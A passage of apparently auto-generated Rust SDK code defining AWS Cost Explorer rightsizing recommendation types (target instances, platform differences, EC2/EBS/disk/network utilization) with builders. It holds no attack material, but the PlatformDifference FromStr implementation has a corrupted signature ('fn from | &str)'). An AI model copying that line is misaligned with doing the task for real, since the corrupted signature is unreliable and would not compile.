FindingReasonCode::NetworkPpsUnderProvisioned => "NETWORK_PPS_UNDER_PROVISIONED",
FindingReasonCode::Unknown(s) => s.as_ref(),
}
}
pub fn values() -> &'static [&'static str] {
&[
"CPU_OVER_PROVISIONED",
"CPU_UNDER_PROVISIONED",
"DISK_IOPS_OVER_PROVISIONED",
"DISK_IOPS_UNDER_PROVISIONED",
"DISK_THROUGHPUT_OVER_PROVISIONED",
"DISK_THROUGHPUT_UNDER_PROVISIONED",
"EBS_IOPS_OVER_PROVISIONED",
"EBS_IOPS_UNDER_PROVISIONED",
"EBS_THROUGHPUT_OVER_PROVISIONED",
"EBS_THROUGHPUT_UNDER_PROVISIONED",
"MEMORY_OVER_PROVISIONED",
"MEMORY_UNDER_PROVISIONED",
"NETWORK_BANDWIDTH_OVER_PROVISIONED",
"NETWORK_BANDWIDTH_UNDER_PROVISIONED",
"NETWORK_PPS_OVER_PROVISIONED",
"NETWORK_PPS_UNDER_PROVISIONED",
]
}
}
impl AsRef<str> for FindingReasonCode {
fn as_ref(&self) -> &str {
self.as_str()
}
}
/// <p>Details on termination recommendation. </p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct TerminateRecommendationDetail {
/// <p>The estimated savings that result from modification, on a monthly basis.</p>
pub estimated_monthly_savings: std::option::Option<std::string::String>,
/// <p>The currency code that Amazon Web Services used to calculate the costs for this
/// instance.</p>
pub currency_code: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for TerminateRecommendationDetail {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("TerminateRecommendationDetail");
formatter.field("estimated_monthly_savings", &self.estimated_monthly_savings);
formatter.field("currency_code", &self.currency_code);
formatter.finish()
}
}
/// See [`TerminateRecommendationDetail`](crate::model::TerminateRecommendationDetail)
pub mod terminate_recommendation_detail {
/// A builder for [`TerminateRecommendationDetail`](crate::model::TerminateRecommendationDetail)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) estimated_monthly_savings: std::option::Option<std::string::String>,
pub(crate) currency_code: std::option::Option<std::string::String>,
}
impl Builder {
/// <p>The estimated savings that result from modification, on a monthly basis.</p>
pub fn estimated_monthly_savings(mut self, input: impl Into<std::string::String>) -> Self {
self.estimated_monthly_savings = Some(input.into());
self
}
pub fn set_estimated_monthly_savings(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.estimated_monthly_savings = input;
self
}
/// <p>The currency code that Amazon Web Services used to calculate the costs for this
/// instance.</p>
pub fn currency_code(mut self, input: impl Into<std::string::String>) -> Self {
self.currency_code = Some(input.into());
self
}
pub fn set_currency_code(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.currency_code = input;
self
}
/// Consumes the builder and constructs a [`TerminateRecommendationDetail`](crate::model::TerminateRecommendationDetail)
pub fn build(self) -> crate::model::TerminateRecommendationDetail {
crate::model::TerminateRecommendationDetail {
estimated_monthly_savings: self.estimated_monthly_savings,
currency_code: self.currency_code,
}
}
}
}
impl TerminateRecommendationDetail {
/// Creates a new builder-style object to manufacture [`TerminateRecommendationDetail`](crate::model::TerminateRecommendationDetail)
pub fn builder() -> crate::model::terminate_recommendation_detail::Builder {
crate::model::terminate_recommendation_detail::Builder::default()
}
}
/// <p> Details on the modification recommendation.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct ModifyRecommendationDetail {
/// <p>Determines whether this instance type is the Amazon Web Services default
/// recommendation.</p>
pub target_instances: std::option::Option<std::vec::Vec<crate::model::TargetInstance>>,
}
impl std::fmt::Debug for ModifyRecommendationDetail {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("ModifyRecommendationDetail");
formatter.field("target_instances", &self.target_instances);
formatter.finish()
}
}
/// See [`ModifyRecommendationDetail`](crate::model::ModifyRecommendationDetail)
pub mod modify_recommendation_detail {
/// A builder for [`ModifyRecommendationDetail`](crate::model::ModifyRecommendationDetail)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) target_instances:
std::option::Option<std::vec::Vec<crate::model::TargetInstance>>,
}
impl Builder {
pub fn target_instances(mut self, input: impl Into<crate::model::TargetInstance>) -> Self {
let mut v = self.target_instances.unwrap_or_default();
v.push(input.into());
self.target_instances = Some(v);
self
}
pub fn set_target_instances(
mut self,
input: std::option::Option<std::vec::Vec<crate::model::TargetInstance>>,
) -> Self {
self.target_instances = input;
self
}
/// Consumes the builder and constructs a [`ModifyRecommendationDetail`](crate::model::ModifyRecommendationDetail)
pub fn build(self) -> crate::model::ModifyRecommendationDetail {
crate::model::ModifyRecommendationDetail {
target_instances: self.target_instances,
}
}
}
}
impl ModifyRecommendationDetail {
/// Creates a new builder-style object to manufacture [`ModifyRecommendationDetail`](crate::model::ModifyRecommendationDetail)
pub fn builder() -> crate::model::modify_recommendation_detail::Builder {
crate::model::modify_recommendation_detail::Builder::default()
}
}
/// <p>Details on recommended instance.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct TargetInstance {
/// <p>The expected cost to operate this instance type on a monthly basis.</p>
pub estimated_monthly_cost: std::option::Option<std::string::String>,
/// <p>The estimated savings that result from modification, on a monthly basis.</p>
pub estimated_monthly_savings: std::option::Option<std::string::String>,
/// <p>The currency code that Amazon Web Services used to calculate the costs for this
/// instance.</p>
pub currency_code: std::option::Option<std::string::String>,
/// <p>Determines whether this recommendation is the defaulted Amazon Web Services
/// recommendation.</p>
pub default_target_instance: bool,
/// <p>Details on the target instance type. </p>
pub resource_details: std::option::Option<crate::model::ResourceDetails>,
/// <p>The expected utilization metrics for target instance type.</p>
pub expected_resource_utilization: std::option::Option<crate::model::ResourceUtilization>,
/// <p> Explains the actions you might need to take in order to successfully migrate your
/// workloads from the current instance type to the recommended instance type. </p>
pub platform_differences: std::option::Option<std::vec::Vec<crate::model::PlatformDifference>>,
}
impl std::fmt::Debug for TargetInstance {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("TargetInstance");
formatter.field("estimated_monthly_cost", &self.estimated_monthly_cost);
formatter.field("estimated_monthly_savings", &self.estimated_monthly_savings);
formatter.field("currency_code", &self.currency_code);
formatter.field("default_target_instance", &self.default_target_instance);
formatter.field("resource_details", &self.resource_details);
formatter.field(
"expected_resource_utilization",
&self.expected_resource_utilization,
);
formatter.field("platform_differences", &self.platform_differences);
formatter.finish()
}
}
/// See [`TargetInstance`](crate::model::TargetInstance)
pub mod target_instance {
/// A builder for [`TargetInstance`](crate::model::TargetInstance)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) estimated_monthly_cost: std::option::Option<std::string::String>,
pub(crate) estimated_monthly_savings: std::option::Option<std::string::String>,
pub(crate) currency_code: std::option::Option<std::string::String>,
pub(crate) default_target_instance: std::option::Option<bool>,
pub(crate) resource_details: std::option::Option<crate::model::ResourceDetails>,
pub(crate) expected_resource_utilization:
std::option::Option<crate::model::ResourceUtilization>,
pub(crate) platform_differences:
std::option::Option<std::vec::Vec<crate::model::PlatformDifference>>,
}
impl Builder {
/// <p>The expected cost to operate this instance type on a monthly basis.</p>
pub fn estimated_monthly_cost(mut self, input: impl Into<std::string::String>) -> Self {
self.estimated_monthly_cost = Some(input.into());
self
}
pub fn set_estimated_monthly_cost(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.estimated_monthly_cost = input;
self
}
/// <p>The estimated savings that result from modification, on a monthly basis.</p>
pub fn estimated_monthly_savings(mut self, input: impl Into<std::string::String>) -> Self {
self.estimated_monthly_savings = Some(input.into());
self
}
pub fn set_estimated_monthly_savings(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.estimated_monthly_savings = input;
self
}
/// <p>The currency code that Amazon Web Services used to calculate the costs for this
/// instance.</p>
pub fn currency_code(mut self, input: impl Into<std::string::String>) -> Self {
self.currency_code = Some(input.into());
self
}
pub fn set_currency_code(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.currency_code = input;
self
}
/// <p>Determines whether this recommendation is the defaulted Amazon Web Services
/// recommendation.</p>
pub fn default_target_instance(mut self, input: bool) -> Self {
self.default_target_instance = Some(input);
self
}
pub fn set_default_target_instance(mut self, input: std::option::Option<bool>) -> Self {
self.default_target_instance = input;
self
}
/// <p>Details on the target instance type. </p>
pub fn resource_details(mut self, input: crate::model::ResourceDetails) -> Self {
self.resource_details = Some(input);
self
}
pub fn set_resource_details(
mut self,
input: std::option::Option<crate::model::ResourceDetails>,
) -> Self {
self.resource_details = input;
self
}
/// <p>The expected utilization metrics for target instance type.</p>
pub fn expected_resource_utilization(
mut self,
input: crate::model::ResourceUtilization,
) -> Self {
self.expected_resource_utilization = Some(input);
self
}
pub fn set_expected_resource_utilization(
mut self,
input: std::option::Option<crate::model::ResourceUtilization>,
) -> Self {
self.expected_resource_utilization = input;
self
}
pub fn platform_differences(
mut self,
input: impl Into<crate::model::PlatformDifference>,
) -> Self {
let mut v = self.platform_differences.unwrap_or_default();
v.push(input.into());
self.platform_differences = Some(v);
self
}
pub fn set_platform_differences(
mut self,
input: std::option::Option<std::vec::Vec<crate::model::PlatformDifference>>,
) -> Self {
self.platform_differences = input;
self
}
/// Consumes the builder and constructs a [`TargetInstance`](crate::model::TargetInstance)
pub fn build(self) -> crate::model::TargetInstance {
crate::model::TargetInstance {
estimated_monthly_cost: self.estimated_monthly_cost,
estimated_monthly_savings: self.estimated_monthly_savings,
currency_code: self.currency_code,
default_target_instance: self.default_target_instance.unwrap_or_default(),
resource_details: self.resource_details,
expected_resource_utilization: self.expected_resource_utilization,
platform_differences: self.platform_differences,
}
}
}
}
impl TargetInstance {
/// Creates a new builder-style object to manufacture [`TargetInstance`](crate::model::TargetInstance)
pub fn builder() -> crate::model::target_instance::Builder {
crate::model::target_instance::Builder::default()
}
}
#[non_exhaustive]
#[derive(
std::clone::Clone,
std::cmp::Eq,
std::cmp::Ord,
std::cmp::PartialEq,
std::cmp::PartialOrd,
std::fmt::Debug,
std::hash::Hash,
)]
pub enum PlatformDifference {
Hypervisor,
InstanceStoreAvailability,
NetworkInterface,
StorageInterface,
VirtualizationType,
/// Unknown contains new variants that have been added since this code was generated.
Unknown(String),
}
impl std::convert::From<&str> for PlatformDifference {
fn from(s: &str) -> Self {
match s {
"HYPERVISOR" => PlatformDifference::Hypervisor,
"INSTANCE_STORE_AVAILABILITY" => PlatformDifference::InstanceStoreAvailability,
"NETWORK_INTERFACE" => PlatformDifference::NetworkInterface,
"STORAGE_INTERFACE" => PlatformDifference::StorageInterface,
"VIRTUALIZATION_TYPE" => PlatformDifference::VirtualizationType,
other => PlatformDifference::Unknown(other.to_owned()),
}
}
}
impl std::str::FromStr for PlatformDifference {
type Err = std::convert::Infallible;
fn from | &str) -> std::result::Result<Self, Self::Err> {
Ok(PlatformDifference::from(s))
}
}
impl PlatformDifference {
pub fn as_str(&self) -> &str {
match self {
PlatformDifference::Hypervisor => "HYPERVISOR",
PlatformDifference::InstanceStoreAvailability => "INSTANCE_STORE_AVAILABILITY",
PlatformDifference::NetworkInterface => "NETWORK_INTERFACE",
PlatformDifference::StorageInterface => "STORAGE_INTERFACE",
PlatformDifference::VirtualizationType => "VIRTUALIZATION_TYPE",
PlatformDifference::Unknown(s) => s.as_ref(),
}
}
pub fn values() -> &'static [&'static str] {
&[
"HYPERVISOR",
"INSTANCE_STORE_AVAILABILITY",
"NETWORK_INTERFACE",
"STORAGE_INTERFACE",
"VIRTUALIZATION_TYPE",
]
}
}
impl AsRef<str> for PlatformDifference {
fn as_ref(&self) -> &str {
self.as_str()
}
}
/// <p>Resource utilization of current resource. </p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct ResourceUtilization {
/// <p>The utilization of current Amazon EC2 instance. </p>
pub ec2_resource_utilization: std::option::Option<crate::model::Ec2ResourceUtilization>,
}
impl std::fmt::Debug for ResourceUtilization {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("ResourceUtilization");
formatter.field("ec2_resource_utilization", &self.ec2_resource_utilization);
formatter.finish()
}
}
/// See [`ResourceUtilization`](crate::model::ResourceUtilization)
pub mod resource_utilization {
/// A builder for [`ResourceUtilization`](crate::model::ResourceUtilization)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) ec2_resource_utilization:
std::option::Option<crate::model::Ec2ResourceUtilization>,
}
impl Builder {
/// <p>The utilization of current Amazon EC2 instance. </p>
pub fn ec2_resource_utilization(
mut self,
input: crate::model::Ec2ResourceUtilization,
) -> Self {
self.ec2_resource_utilization = Some(input);
self
}
pub fn set_ec2_resource_utilization(
mut self,
input: std::option::Option<crate::model::Ec2ResourceUtilization>,
) -> Self {
self.ec2_resource_utilization = input;
self
}
/// Consumes the builder and constructs a [`ResourceUtilization`](crate::model::ResourceUtilization)
pub fn build(self) -> crate::model::ResourceUtilization {
crate::model::ResourceUtilization {
ec2_resource_utilization: self.ec2_resource_utilization,
}
}
}
}
impl ResourceUtilization {
/// Creates a new builder-style object to manufacture [`ResourceUtilization`](crate::model::ResourceUtilization)
pub fn builder() -> crate::model::resource_utilization::Builder {
crate::model::resource_utilization::Builder::default()
}
}
/// <p>Utilization metrics of the instance. </p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct Ec2ResourceUtilization {
/// <p> The maximum observed or expected CPU utilization of the instance.</p>
pub max_cpu_utilization_percentage: std::option::Option<std::string::String>,
/// <p> The maximum observed or expected memory utilization of the instance.</p>
pub max_memory_utilization_percentage: std::option::Option<std::string::String>,
/// <p> The maximum observed or expected storage utilization of the instance. This doesn't
/// include EBS storage.</p>
pub max_storage_utilization_percentage: std::option::Option<std::string::String>,
/// <p>The EBS field that contains a list of EBS metrics that are associated with the current
/// instance. </p>
pub ebs_resource_utilization: std::option::Option<crate::model::EbsResourceUtilization>,
/// <p> The field that contains a list of disk (local storage) metrics that are associated
/// with the current instance. </p>
pub disk_resource_utilization: std::option::Option<crate::model::DiskResourceUtilization>,
/// <p> The network field that contains a list of network metrics that are associated with
/// the current instance. </p>
pub network_resource_utilization: std::option::Option<crate::model::NetworkResourceUtilization>,
}
impl std::fmt::Debug for Ec2ResourceUtilization {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("Ec2ResourceUtilization");
formatter.field(
"max_cpu_utilization_percentage",
&self.max_cpu_utilization_percentage,
);
formatter.field(
"max_memory_utilization_percentage",
&self.max_memory_utilization_percentage,
);
formatter.field(
"max_storage_utilization_percentage",
&self.max_storage_utilization_percentage,
);
formatter.field("ebs_resource_utilization", &self.ebs_resource_utilization);
formatter.field("disk_resource_utilization", &self.disk_resource_utilization);
formatter.field(
"network_resource_utilization",
&self.network_resource_utilization,
);
formatter.finish()
}
}
/// See [`Ec2ResourceUtilization`](crate::model::Ec2ResourceUtilization)
pub mod ec2_resource_utilization {
/// A builder for [`Ec2ResourceUtilization`](crate::model::Ec2ResourceUtilization)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) max_cpu_utilization_percentage: std::option::Option<std::string::String>,
pub(crate) max_memory_utilization_percentage: std::option::Option<std::string::String>,
pub(crate) max_storage_utilization_percentage: std::option::Option<std::string::String>,
pub(crate) ebs_resource_utilization:
std::option::Option<crate::model::EbsResourceUtilization>,
pub(crate) disk_resource_utilization:
std::option::Option<crate::model::DiskResourceUtilization>,
pub(crate) network_resource_utilization:
std::option::Option<crate::model::NetworkResourceUtilization>,
}
impl Builder {
/// <p> The maximum observed or expected CPU utilization of the instance.</p>
pub fn max_cpu_utilization_percentage(
mut self,
input: impl Into<std::string::String>,
) -> Self {
self.max_cpu_utilization_percentage = Some(input.into());
self
}
pub fn set_max_cpu_utilization_percentage(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.max_cpu_utilization_percentage = input;
self
}
/// <p> The maximum observed or expected memory utilization of the instance.</p>
pub fn max_memory_utilization_percentage(
mut self,
input: impl Into<std::string::String>,
) -> Self {
self.max_memory_utilization_percentage = Some(input.into());
self
}
pub fn set_max_memory_utilization_percentage(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.max_memory_utilization_percentage = input;
self
}
/// <p> The maximum observed or expected storage utilization of the instance. This doesn't
/// include EBS storage.</p>
pub fn max_storage_utilization_percentage(
mut self,
input: impl Into<std::string::String>,
) -> Self {
self.max_storage_utilization_percentage = Some(input.into());
self
}
pub fn set_max_storage_utilization_percentage(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.max_storage_utilization_percentage = input;
self
}
/// <p>The EBS field that contains a list of EBS metrics that are associated with the current
/// instance. </p>
pub fn ebs_resource_utilization(
mut self,
input: crate::model::EbsResourceUtilization,
) -> Self {
self.ebs_resource_utilization = Some(input);
self
}
pub fn set_ebs_resource_utilization(
mut self,
input: std::option::Option<crate::model::EbsResourceUtilization>,
) -> Self {
self.ebs_resource_utilization = input;
self
}
/// <p> The field that contains a list of disk (local storage) metrics that are associated
/// with the current instance. </p>
pub fn disk_resource_utilization(
mut self,
input: crate::model::DiskResourceUtilization,
) -> Self {
self.disk_resource_utilization = Some(input);
self
}
pub fn set_disk_resource_utilization(
mut self,
input: std::option::Option<crate::model::DiskResourceUtilization>,
) -> Self {
self.disk_resource_utilization = input;
self
}
/// <p> The network field that contains a list of network metrics that are associated with
/// the current instance. </p>
pub fn network_resource_utilization(
mut self,
input: crate::model::NetworkResourceUtilization,
) -> Self {
self.network_resource_utilization = Some(input);
self
}
pub fn set_network_resource_utilization(
mut self,
input: std::option::Option<crate::model::NetworkResourceUtilization>,
) -> Self {
self.network_resource_utilization = input;
self
}
/// Consumes the builder and constructs a [`Ec2ResourceUtilization`](crate::model::Ec2ResourceUtilization)
pub fn build(self) -> crate::model::Ec2ResourceUtilization {
crate::model::Ec2ResourceUtilization {
max_cpu_utilization_percentage: self.max_cpu_utilization_percentage,
max_memory_utilization_percentage: self.max_memory_utilization_percentage,
max_storage_utilization_percentage: self.max_storage_utilization_percentage,
ebs_resource_utilization: self.ebs_resource_utilization,
disk_resource_utilization: self.disk_resource_utilization,
network_resource_utilization: self.network_resource_utilization,
}
}
}
}
impl Ec2ResourceUtilization {
/// Creates a new builder-style object to manufacture [`Ec2ResourceUtilization`](crate::model::Ec2ResourceUtilization)
pub fn builder() -> crate::model::ec2_resource_utilization::Builder {
crate::model::ec2_resource_utilization::Builder::default()
}
}
/// <p> The network field that contains a list of network metrics that are associated with
/// the current instance. </p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct NetworkResourceUtilization {
/// <p> The network inbound throughput utilization measured in Bytes per second. </p>
pub network_in_bytes_per_second: std::option::Option<std::string::String>,
/// <p> The network outbound throughput utilization measured in Bytes per second. </p>
pub network_out_bytes_per_second: std::option::Option<std::string::String>,
/// <p> The network ingress packets that are measured in packets per second. </p>
pub network_packets_in_per_second: std::option::Option<std::string::String>,
/// <p> The network outgress packets that are measured in packets per second. </p>
pub network_packets_out_per_second: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for NetworkResourceUtilization {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("NetworkResourceUtilization");
formatter.field(
"network_in_bytes_per_second",
&self.network_in_bytes_per_second,
);
formatter.field(
"network_out_bytes_per_second",
&self.network_out_bytes_per_second,
);
formatter.field(
"network_packets_in_per_second",
&self.network_packets_in_per_second,
);
formatter.field(
"network_packets_out_per_second",
&self.network_packets_out_per_second,
);
formatter.finish()
}
}
/// See [`NetworkResourceUtilization`](crate::model::NetworkResourceUtilization)
pub mod network_resource_utilization {
/// A builder for [`NetworkResourceUtilization`](crate::model::NetworkResourceUtilization)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) network_in_bytes_per_second: std::option::Option<std::string::String>,
pub(crate) network_out_bytes_per_second: std::option::Option<std::string::String>,
pub(crate) network_packets_in_per_second: std::option::Option<std::string::String>,
pub(crate) network_packets_out_per_second: std::option::Option<std::string::String>,
}
impl Builder {
/// <p> The network inbound throughput utilization measured in Bytes per second. </p>
pub fn network_in_bytes_per_second(
mut self,
input: impl Into<std::string::String>,
) -> Self {
self.network_in_bytes_per_second = Some(input.into());
self
}
pub fn set_network_in_bytes_per_second(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.network_in_bytes_per_second = input;
self
}
/// <p> The network outbound throughput utilization measured in Bytes per second. </p>
pub fn network_out_bytes_per_second(
mut self,
input: impl Into<std::string::String>,
) -> Self {
self.network_out_bytes_per_second = Some(input.into());
self
}
pub fn set_network_out_bytes_per_second(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.network_out_bytes_per_second = input;
self
}
/// <p> The network ingress packets that are measured in packets per second. </p>
pub fn network_packets_in_per_second(
mut self,
input: impl Into<std::string::String>,
) -> Self {
self.network_packets_in_per_second = Some(input.into());
self
}
pub fn set_network_packets_in_per_second(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.network_packets_in_per_second = input;
self
}
/// <p> The network outgress packets that are measured in packets per second. </p>
pub fn network_packets_out_per_second(
mut self,
input: impl Into<std::string::String>,
) -> Self {
self.network_packets_out_per_second = Some(input.into());
self
}
pub fn set_network_packets_out_per_second(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.network_packets_out_per_second = input;
self
}
/// Consumes the builder and constructs a [`NetworkResourceUtilization`](crate::model::NetworkResourceUtilization)
pub fn build(self) -> crate::model::NetworkResourceUtilization {
crate::model::NetworkResourceUtilization {
network_in_bytes_per_second: self.network_in_bytes_per_second,
network_out_bytes_per_second: self.network_out_bytes_per_second,
network_packets_in_per_second: self.network_packets_in_per_second,
network_packets_out_per_second: self.network_packets_out_per_second,
}
}
}
}
impl NetworkResourceUtilization {
/// Creates a new builder-style object to manufacture [`NetworkResourceUtilization`](crate::model::NetworkResourceUtilization)
pub fn builder() -> crate::model::network_resource_utilization::Builder {
crate::model::network_resource_utilization::Builder::default()
}
}
/// <p> The field that contains a list of disk (local storage) metrics that are associated
/// with the current instance. </p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct DiskResourceUtilization {
/// <p> The maximum number of read operations per second. </p>
pub disk_read_ops_per_second: std::option::Option<std::string::String>,
/// <p> The maximum number of write operations per second. </p>
pub disk_write_ops_per_second: std::option::Option<std::string::String>,
/// <p> The maximum read throughput operations per second. </p>
pub disk_read_bytes_per_second: std::option::Option<std::string::String>,
/// <p> The maximum write throughput operations per second. </p>
pub disk_write_bytes_per_second: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for DiskResourceUtilization {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("DiskResourceUtilization");
formatter.field("disk_read_ops_per_second", &self.disk_read_ops_per_second);
formatter.field("disk_write_ops_per_second", &self.disk_write_ops_per_second);
formatter.field(
"disk_read_bytes_per_second",
&self.disk_read_bytes_per_second,
);
formatter.field(
"disk_write_bytes_per_second",
&self.disk_write_bytes_per_second,
);
formatter.finish()
}
}
/// See [`DiskResourceUtilization`](crate::model::DiskResourceUtilization)
pub mod disk_resource_utilization {
/// A builder for [`DiskResourceUtilization`](crate::model::DiskResourceUtilization)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) disk_read_ops_per_second: std::option::Option<std::string::String>,
pub(crate) disk_write_ops_per_second: std::option::Option<std::string::String>,
pub(crate) disk_read_bytes_per_second: std::option::Option<std::string::String>,
pub(crate) disk_write_bytes_per_second: std::option::Option<std::string::String>,
}
impl Builder {
/// <p> The maximum number of read operations per second. </p>
pub fn disk_read_ops_per_second(mut self, input: impl Into<std::string::String>) -> Self {
self.disk_read_ops_per_second = Some(input.into());
self
}
pub fn set_disk_read_ops_per_second(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.disk_read_ops_per_second = input;
self
}
/// <p> The maximum number of write operations per second. </p>
pub fn disk_write_ops_per_second(mut self, input: impl Into<std::string::String>) -> Self {
self.disk_write_ops_per_second = Some(input.into());
self
}
pub fn set_disk_write_ops_per_second(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.disk_write_ops_per_second = input;
self
}
/// <p> The maximum read throughput operations per second. </p>
pub fn disk_read_bytes_per_second(mut self, input: impl Into<std::string::String>) -> Self {
self.disk_read_bytes_per_second = Some(input.into());
self
}
pub fn set_disk_read_bytes_per_second(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.disk_read_bytes_per_second = input;
self
}
/// <p> The maximum write throughput operations per second. </p>
pub fn disk_write_bytes_per_second(
mut self,
input: impl Into<std::string::String>,
) -> Self {
self.disk_write_bytes_per_second = Some(input.into());
self
}
pub fn set_disk_write_bytes_per_second(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.disk_write_bytes_per_second = input;
self
}
/// Consumes the builder and constructs a [`DiskResourceUtilization`](crate::model::DiskResourceUtilization)
pub fn build(self) -> crate::model::DiskResourceUtilization {
crate::model::DiskResourceUtilization {
disk_read_ops_per_second: self.disk_read_ops_per_second,
disk_write_ops_per_second: self.disk_write_ops_per_second,
disk_read_bytes_per_second: self.disk_read_bytes_per_second,
disk_write_bytes_per_second: self.disk_write_bytes_per_second,
}
}
}
}
impl DiskResourceUtilization {
/// Creates a new builder-style object to manufacture [`DiskResourceUtilization`](crate::model::DiskResourceUtilization)
pub fn builder() -> crate::model::disk_resource_utilization::Builder {
crate::model::disk_resource_utilization::Builder::default()
}
}
/// <p>The EBS field that contains a list of EBS metrics that are associated with the current
/// instance. </p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct EbsResourceUtilization {
/// <p>The maximum number of read operations per second. </p>
pub ebs_read_ops_per_second: std::option::Option<std::string::String>,
/// <p>The maximum number of write operations per second. </p>
pub ebs_write_ops_per_second: std::option::Option<std::string::String>,
/// <p>The maximum size of read operations per second </p>
pub ebs_read_bytes_per_second: std::option::Option<std::string::String>,
/// <p>The maximum size of write operations per second. </p>
pub ebs_write_bytes_per_second: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for EbsResourceUtilization {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("EbsResourceUtilization");
formatter.field("ebs_read_ops_per_second", &self.ebs_read_ops_per_second);
formatter.field("ebs_write_ops_per_second", &self.ebs_write_ops_per_second);
formatter.field("ebs_read_bytes_per_second", &self.ebs_read_bytes_per_second);
formatter.field(
"ebs_write_bytes_per_second",
&self.ebs_write_bytes_per_second,
);
formatter.finish()
}
}
/// See [`EbsResourceUtilization`](crate::model::EbsResourceUtilization)
pub mod ebs_resource_utilization {
/// A builder for [`EbsResourceUtilization`](crate::model::EbsResourceUtilization)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) ebs_read_ops_per_second: std::option::Option<std::string::String>,
pub(crate) ebs_write_ops_per_second: std::option::Option<std::string::String>,
pub(crate) ebs_read_bytes_per_second: std::option::Option<std::string::String>,
pub(crate) ebs_write_bytes_per_second: std::option::Option<std::string::String>,
}
impl Builder {
/// <p>The maximum number of read operations per second. </p>
pub fn ebs_read_ops_per_second(mut self, input: impl Into<std::string::String>) -> Self {
self.ebs_read_ops_per_second = Some(input.into());
self
}
pub fn set_ebs_read_ops_per_second(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.ebs_read_ops_per_second = input;
self
}
/// <p>The maximum number of write operations per second. </p>
pub fn ebs_write_ops_per_second(mut self, input: impl Into<std::string::String>) -> Self {
self.ebs_write_ops_per_second = Some(input.into());
self
}
pub fn set_ebs_write_ops_per_second(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.ebs_write_ops_per_second = input;
self
}
/// <p>The maximum size of read operations per second </p>
pub fn ebs_read_bytes_per_second(mut self, input: impl Into<std::string::String>) -> Self {
self.ebs_read_bytes_per_second = Some(input.into());
self
}
pub fn set_ebs_read_bytes_per_second(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.ebs_read_bytes_per_second = input;
self
}
/// <p>The maximum size of write operations per second. </p>
pub fn ebs_write_bytes_per_second(mut self, input: impl Into<std::string::String>) -> Self {
self.ebs_write_bytes_per_second = Some(input.into());
self
}
pub fn set_ebs_write_bytes_per_second(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.ebs_write_bytes_per_second = input;
self
}
/// Consumes the builder and constructs a [`EbsResourceUtilization`](crate::model::EbsResourceUtilization)
pub fn build(self) -> crate::model::EbsResourceUtilization {
crate::model::EbsResourceUtilization {
ebs_read_ops_per_second: self.ebs_read_ops_per_second,
ebs_write_ops_per_second: self.ebs_write_ops_per_second,
ebs_read_bytes_per_second: self.ebs_read_bytes_per_second,
ebs_write_bytes_per_second: self.ebs_write_bytes_per_second,
}
}
}
}
impl EbsResourceUtilization {
